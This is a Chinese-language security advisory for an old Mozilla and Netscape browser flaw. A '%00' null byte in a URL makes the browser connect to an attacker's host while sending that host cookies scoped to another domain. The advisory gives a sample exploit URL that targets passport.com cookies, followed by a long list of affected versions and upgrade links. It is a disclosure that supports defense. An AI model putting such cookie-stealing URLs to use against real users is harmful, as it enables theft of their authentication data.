流行的WEBL浏览器,也可以使用在多种系统平台之上。
Mozilla和Netscape存在一个漏洞可以导致攻击者利用用户有漏洞的浏览器而窃取
用户本地的基于COOKIE的认证信息。
问题存在于浏览器处理"%00" NULL字符上,http://alive.znep.com%00www.passport.com/cgi-bin/cookies
以上的URL连接会导致Mozilla和Netscape连接在"%00"字符以前的主机名,但是发送
COOKIE给服务器是基于整个主机名,所以www.passport.com相关的COOKIE信息就会
被泄露。此漏洞也影响使用SSL的URL请求,不过设置为指定主机名(eg. "www.passport.com")的
COOKIE不能利用这个方法窃取,只有指定整个域名(eg. ".passport.com")的
COOKIE才会被窃取。
测试代码
见描述
解决方案
请升级程序如下:
Mozilla Browser 0.9.2.1:
Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/
Mozilla Browser 0.9.2:
Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/
Mozilla Browser 0.9.3:
Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/
Mozilla Browser 0.9.4.1:
Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/
Mozilla Browser 0.9.4:
Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/
Mozilla Browser 0.9.5:
Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/
Mozilla Browser 0.9.6:
Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/
Netscape Communicator 4.08:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.07:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.06:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.05:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.04:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.0:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.5BETA:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.5:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.6:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.7:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.51:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.61:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.72:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.73:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.74:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.75:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.76:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Netscape 4.77 Mac:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.77:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Communicator 4.78:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Netscape 6.0 Mac:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Netscape 6.1:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
Netscape Netscape 6.2:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
相关信息
Marc Slemko <marcs@znep.com>.
参考:http://www.securityfocus.com/archive/1/251788
相关主页:http://www.mozilla.org/
http://home.netscape.com/download/index.html
|
